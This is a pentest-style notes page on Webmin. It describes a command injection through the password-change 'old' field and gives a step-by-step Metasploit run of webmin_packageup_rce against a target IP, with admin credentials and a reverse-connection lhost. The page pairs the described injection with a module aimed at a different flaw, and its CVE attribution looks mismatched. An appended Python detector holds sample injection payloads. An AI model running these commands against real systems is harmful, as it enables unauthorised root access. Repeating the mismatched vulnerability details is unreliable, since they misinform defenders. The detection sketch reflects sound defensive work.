# 10000 - Webmin

Webmin is a **web-based system administration interface** for Unix-like systems, typically running on port `10000` by default. It allows administrators to manage various aspects of a system—such as users, services, packages, and configuration files—entirely through a browser, without needing to use the terminal or SSH.

## RCE

[CVE-2019-9624](https://nvd.nist.gov/vuln/detail/cve-2019-9624) is an RCE in Webmin versions prior to `1.910`. It specifically affects installations where the `old password` option is enabled for password changes. In vulnerable versions, when a user submits a password change request, Webmin checks the old password, but only if the `old password` option is enabled in the configuration. Due to improper input handling, an attacker can craft a request that injects OS commands through the `old` password field. These commands are then executed with the privileges of the Webmin process (often `root`).

MSF's [`webmin_packageup_rce`](https://www.rapid7.com/db/modules/exploit/linux/http/webmin_packageup_rce/) module can be used:

{% code overflow="wrap" %}

```bash
msf6 > use exploit/linux/http/webmin_packageup_rce
msf6 exploit(linux/http/webmin_packageup_rce) > set password Password6543
msf6 exploit(linux/http/webmin_packageup_rce) > set username admin
msf6 exploit(linux/http/webmin_packageup_rce) > set rhosts 172.16.1.1
msf6 exploit(linux/http/webmin_packageup_rce) > set rport 10000
msf6 exploit(linux/http/webmin_packageup_rce) > set lhost tun0
msf6 exploit(linux/http/webmin_packageup_rce) > run
```

{% endcode %}
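A detection sketch for the injection described above, added here as an example (not code from the original page or from Webmin): it flags shell metacharacters in the `old` field of logged password-change form bodies. The log source, the record layout and the `user`/`new1`/`new2` field names are assumptions, and the sample records are constructed.

```python
import re
from urllib.parse import parse_qs

# Characters and sequences a shell would interpret if the value reached a command line.
SHELL_META = re.compile(r"[|;&`<>\n\r]|\$\(|\$\{")

def check_old_field(body: str) -> list[str]:
    """Return reasons the `old` field of a URL-encoded form body looks unsafe."""
    reasons = []
    values = parse_qs(body, keep_blank_values=True).get("old", [])
    if len(values) > 1:
        # Parsers disagree on which duplicate wins; a filter may inspect the wrong one.
        reasons.append("duplicate 'old' parameter")
    for value in values:
        hit = SHELL_META.search(value)
        if hit:
            reasons.append(f"shell metacharacter {hit.group()!r} in 'old'")
        # Percent-escapes left after one decode pass suggest double-encoding.
        if re.search(r"%[0-9a-fA-F]{2}", value):
            reasons.append("percent-encoding survives decoding")
    return reasons

def scan(records):
    """records: iterable of (timestamp, client_ip, body); returns flagged entries."""
    return [(ts, ip, why) for ts, ip, body in records
            if (why := check_old_field(body))]

# Constructed sample records (not real traffic), as a proxy that logs POST bodies
# might emit them. Assumed layout: (timestamp, client IP, form body).
SAMPLE = [
    ("2024-01-01T10:00:00Z", "192.0.2.10", "user=alice&old=Summer2023&new1=Xy7pqLm2&new2=Xy7pqLm2"),
    ("2024-01-01T10:00:05Z", "192.0.2.66", "user=alice&old=x%7Cid&new1=a&new2=a"),
    ("2024-01-01T10:00:09Z", "192.0.2.66", "user=alice&old=x%257Cid&new1=a&new2=a"),
    ("2024-01-01T10:00:12Z", "192.0.2.66", "user=alice&old=a&old=b&new1=a&new2=a"),
]

if __name__ == "__main__":
    for ts, ip, why in scan(SAMPLE):
        print(ts, ip, "; ".join(why))
```

Legitimate passwords can contain characters such as `;` or `&`, so a hit is a lead for triage rather than a verdict.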


